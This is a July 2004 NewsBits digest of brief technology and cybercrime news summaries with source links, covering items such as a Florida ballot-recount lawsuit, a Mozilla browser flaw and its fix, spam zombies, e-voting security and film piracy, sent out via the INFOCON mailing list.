Lawsuit challenges Florida ballot-recount rules
Voter rights groups sued Florida election administrators
yesterday to overturn a rule that prohibits the manual
recounting of ballots cast with touch-screen machines,
a lawsuit with echoes of the state's disputed 2000
presidential election voting.
http://computerworld.com/governmenttopics/government/legalissues/story/0,10801,94401,00.html
- - - - - - - - - -
LA plans cybercafe teen curfew
Los Angeles is to impose a curfew on kids into
cybercafes because the venues have become a popular
hangout for truants and the focus of serious youth
violence in the city. Cybercafes (or PC baangs)
with more than five machines will need a police
license and must install video cameras for security
under regulations put forward in Los Angeles City
Council yesterday. Children under 18 will be banned
from cafes on school days between 08.30am and
13.30pm and after 2200pm. Cyber cafe customers will
be required to provide identification on request.
http://www.theregister.co.uk/2004/07/08/la_cybercafe_curfew/
http://www.usatoday.com/tech/news/2004-07-08-cybercafes_x.htm
http://www.latimes.com/technology/la-me-cyber8jul08,1,2137421.story
- - - - - - - - - -
Feds drag feet on cybersecurity, officials say
Business and government representatives teamed up
in March to recommend steps to reduce the nation's
vulnerability to cyberattacks. But they say they
have yet to receive a response from the U.S.
Department of Homeland Security, and wonder what
is causing the delay. "There has been a 'pregnant
pause' waiting for a response," says Rick White,
CEO of TechNet, a technology industry trade group
and co-sponsor of a December 2003 summit to develop
an action plan.
http://computerworld.com/securitytopics/security/story/0,10801,94391,00.html
- - - - - - - - - -
Security hole found in Mozilla browser
Developers at the open-source Mozilla
Foundation have confirmed that the latest version
of their Web browsers have a security flaw that
could allow attackers to run existing programs
on the Windows XP operating system. The flaw,
known as the "shell" exploit, was publicized
Wednesday on a security mailing list, along with
a link to a fix for the problem. Updated versions
of the affected software programs, which include
the Mozilla, Firefox and Thunderbird browsers,
have been released.
http://news.com.com/Security+hole+found+in+Mozilla+browser/2100-1002_3-5262676.html
- - - - - - - - - -
Sexual abuse online
According to Washington ProFile, every fifth under
age user of the Internet runs the risk of online
sexual abuse. These statistics are given in the
report of the National Center for Missing and
Exploited Children. Sexual molestation is a proposal
to enter into sexual activity or provide sexual
information (images, video). The authors of the
survey did not register any case when Internet
molestation led to real sexual contact or violation.
http://www.crime-research.org/news/08.07.2004/475/
- - - - - - - - - -
Fast backs Whitehall copyright clampdown
Federation Against Software Theft welcomes DTI
intellectual property crime strategy. The Federation
Against Software Theft (Fast) has welcomed government
moves to clamp down on copyright piracy. The Department
of Trade and Industry (DTI) has established the Creative
Industries IPR Forum to provide a national strategy
for dealing with intellectual property (IP) crime.
http://www.vnunet.com/news/1156519
- - - - - - - - - -
Government keeps mum on IT project monitoring
The government has rejected calls for the Gateway
IT project monitoring reports to be published.
Treasury financial secretary Ruth Kelly told MPs
that the confidentiality of the Gateway process,
run by Whitehall buying agency the Office of
Government Commerce (OGC), is key to its success.
http://www.vnunet.com/news/1156505
- - - - - - - - - -
Cybersecurity research underfunded, executives say
The National Science Foundation can only fund a
subset of the research proposals it receives on
ways to better IT system security, an NSF official
said at a House technology subcommittee hearing.
"There are good ideas in the cybersecurity area
that we're simply not able to fund," Peter Freeman,
assistant director of NSF's computer and information
science and engineering directorate, said at
yesterday's hearing.
http://www.gcn.com/vol1_no1/daily-updates/26526-1.html
- - - - - - - - - -
Stolen a film? MPAA wants to know
One in four people online has illegally downloaded
a feature film--and it's cutting into box-office and
DVD sales, the Motion Picture Association of America
said in a study released Thursday. A survey of 3,600
Internet users in eight countries showed that as many
as 50 percent had downloaded copyrighted content in
the last year. Of those people who have downloaded
films, 17 percent said they are going to the movies
less often, and 26 percent said they bought fewer
DVDs, according to online researcher OTX, which
conducted the study in partnership with the MPAA.
http://zdnet.com.com/2100-1104_2-5262427.html
- - - - - - - - - -
Postini: Half of all e-mail requests rejected
Antispam company Postini Inc. is now rejecting
more than half of all attempts to send e-mail
to its customers, in part because of increased
activity from compromised home computers that
have been turned into "zombies" for sending
unsolicited commercial e-mail. The company
is dropping 53% of all e-mail connections that
use the Simple Mail Transfer Protocol (SMTP)
without reading the content of the e-mail
messages.
http://computerworld.com/softwaretopics/software/groupware/story/0,10801,94378,00.html
- - - - - - - - - -
Web app vulnerabilities on the rise
Nine out of 10 web applications remain vulnerable
to attack even after developers think they have
been 'fixed', security experts have claimed.
A study by security firm Imperva on the vulnerability
of public and private web applications found that,
despite periodic penetration testing and subsequent
fixes, flaws reappeared over time.
http://www.vnunet.com/news/1156498
- - - - - - - - - -
Analyst: UN Needs Warriors in Spam Battle
An international effort can wipe out spam by 2006,
says an agency of the United Nations, the International
Telecommunications Union. The group is sponsoring
an ongoing anti-spam conference in Geneva that has
drawn representatives of more than 60 countries
and global organizations.
http://www.newsfactor.com/story.xhtml?story_title=Analyst--UN-Needs-Warriors-in-Spam-Battle
- - - - - - - - - -
Intel to add NX security to Pentium 4 in Q4
Intel will add support for Microsoft's No Execute (NX)
security technology to its P4 CPUs in Q4, reports suggest.
Taiwanese motherboard maker sources cited by DigiTimes
claim the chip giant will introduce support for NX from
the end of Q3. A BIOS update will be all that's required
to enable support at the mobo level, they add.
http://www.theregister.co.uk/2004/07/08/intel_nx_support/
- - - - - - - - - -
Fujitsu technique hides data in images
Fujitsu has developed a method of embedding data
invisibly within printed pictures. The procedure,
commonly known as steganography, will allow
numerical information to be hidden within a color
image and accessed via a camera. Steganography
involves altering an image in a way that cannot
be perceived by the human eye, but which can
be detected electronically. Fujitsu's technique
can apparently hide a 12-digit number in a
1-centimeter square.
http://zdnet.com.com/2100-1103_2-5260241.html
- - - - - - - - - -
Investigating digital images
What's real and what's phony? "Seeing is no longer
believing. Actually, what you see is largely irrelevant,"
says Dartmouth Professor Hany Farid. He is referring
to the digital images that appear everywhere: in
newspapers, on Web sites, in advertising, and in
business materials, for example. Farid and Dartmouth
graduate student Alin Popescu have developed a
mathematical technique to tell the difference between
a "real" image and one that's been fiddled with.
http://www.dartmouth.edu/~news/releases/2004/07/01.html
- - - - - - - - - -
Spam can hurt in more ways than one
Small businesses that depend heavily on the Web and
e-mail to market products are increasingly caught in
a spam squeeze. Hackers and spammers hijack their PCs -
and then Internet providers wrongly shut down the
victims' e-mail.
http://www.usatoday.com/tech/news/2004-07-07-spam_x.htm
- - - - - - - - - -
E-voting security: getting it right
As we noted in our previous story - E-voting security:
looking good on paper? - the much-celebrated voter
verifiable paper trail is useless as a security measure
for Direct Recording Electronic (DRE) election systems,
and actually introduces far more problems than it solves.
http://www.theregister.co.uk/2004/07/08/getting_e-voting_security_right/

Wash. state announces safeguards for electronic voting
http://www.usatoday.com/tech/news/techpolicy/2004-07-08-wash-evote_x.htm
- - - - - - - - - -
Security spending rises, as do risks
IT security spending across the world is rising, but
so are virus and malicious code attacks. The findings
from the Global Information Security Survey, conducted
by vnunet.com's sister magazine Computing and its
international sister publications, show businesses
are not following best practice security advice,
but are increasing security budgets to cope with
growing threats.
http://www.vnunet.com/news/1156507
- - - - - - - - - -
Service Pack Deux?
Microsoft should make SP2 available to all users
and backport the changes to older operating systems,
or they risk putting profits ahead of security yet
again. As some of you may have guessed by now, one
of my side interests when I'm not sitting in front
of a computer is the study of history.
http://www.securityfocus.com/columnists/254
- - - - - - - - - -
Reducing the risk from P2P downloads
Each week vnunet.com asks a different expert
to give their views on recent virus and security
issues, with advice, warnings and information on
the latest threats. This week Frank Coggrave, UK
regional director of Websense, examines the legal
implications for businesses and IT directors of
employee use of P2P networks.
http://www.vnunet.com/news/1156524
- - - - - - - - - -
Terrorists rely on tech tools, researcher finds
The Internet has become the new Afghanistan for
terrorist training, recruitment, and fundraising,
an academic said. Terrorist groups are exploiting
the accessibility, vast audience, and anonymity
of the Internet to raise money and recruit new
members, said Gabriel Weimann, chairman of the
communications department at the University of
Haifa in Israel. The number of terrorists' Web
sites has increased by 571% in the past seven
years, Weimann says.
http://computerworld.com/securitytopics/security/story/0,10801,94390,00.html
***********************************************************
Search the NewsBits.net Archive at:
http://www.newsbits.net/search.html
***********************************************************
The source material may be copyrighted and all rights are
retained by the original author/publisher. The information
is provided to you for non-profit research and educational
purposes. Reproduction of this text is encouraged; however
copies may not be sold, and NewsBits (www.newsbits.net)
should be cited as the source of the information.
Copyright 2000-2004, NewsBits.net, Campbell, CA.
_____________________________________________________________________
Asst. Chief Ron Levine (Acting) | Voice (650)949-7339
Foothill-DeAnza College Dist. Police | FAX (650)941-4963
12345 El Monte Road | Pager (888)399-7369
Los Altos Hills, CA 94022 | mailto:rlevine@ix.netcom.com
---------------------------------------------------------------------
Visit the Foothill-DeAnza College Dist. Police Web Site at
http://www.foothill.fhda.edu/police/
---------------------------------------------------------------------

------------------------------------------------------------------------
Information is the currency of victory on the battlefield.
GEN Gordon Sullivan, CSA (1993)
------------------------------------------------------------------------

INFOCON Mailing List @
IWS - The Information Warfare Site
http://www.iwar.org.uk

------------------------------------------------------------------------
To subscribe, change your subscription or unsubscribe go to http://www.iwar.org.uk/mailman/listinfo/infocon/

